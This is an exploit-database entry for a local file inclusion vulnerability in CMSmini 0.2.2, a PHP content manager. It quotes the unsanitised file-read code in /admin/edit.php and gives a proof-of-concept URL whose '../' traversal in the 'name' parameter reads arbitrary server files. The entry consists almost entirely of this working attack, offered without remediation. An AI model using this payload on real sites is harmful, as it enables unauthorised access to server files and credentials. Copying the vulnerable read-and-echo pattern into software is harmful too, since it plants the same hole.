CMSmini 0.2.2 Local File Inclusion

2011-10-19T00:00:00
ID 1337DAY-ID-17010
Type zdt
Reporter i2sec
Modified 2011-10-19T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: [CMSmini 0.2.2 Local File Inclusion]
# Date: [2011.10.20]
# Author: [I2Sec5-BSK]
# Software Link: [http://sourceforge.net/projects/cmsmini/]
# Version: [CMSmini 0.2.2]
# Tested on: [Windows XP]
 
--------------------------------------------------
 
/admin/edit.php
 
30 $name = $_GET['name'];
73 $filename = $dirpath.'/'.$name;
74 $fh = fopen($filename, 'r');
75 $data = fread($fh, filesize($filename));
76 fclose($fh);
77 echo $data;
 
---------------------------------------------------
 
POC : http://[ Address ]/admin/edit.php?name=../../../../../../../../../../../../[ Local File ]



#  0day.today [2018-01-04]  #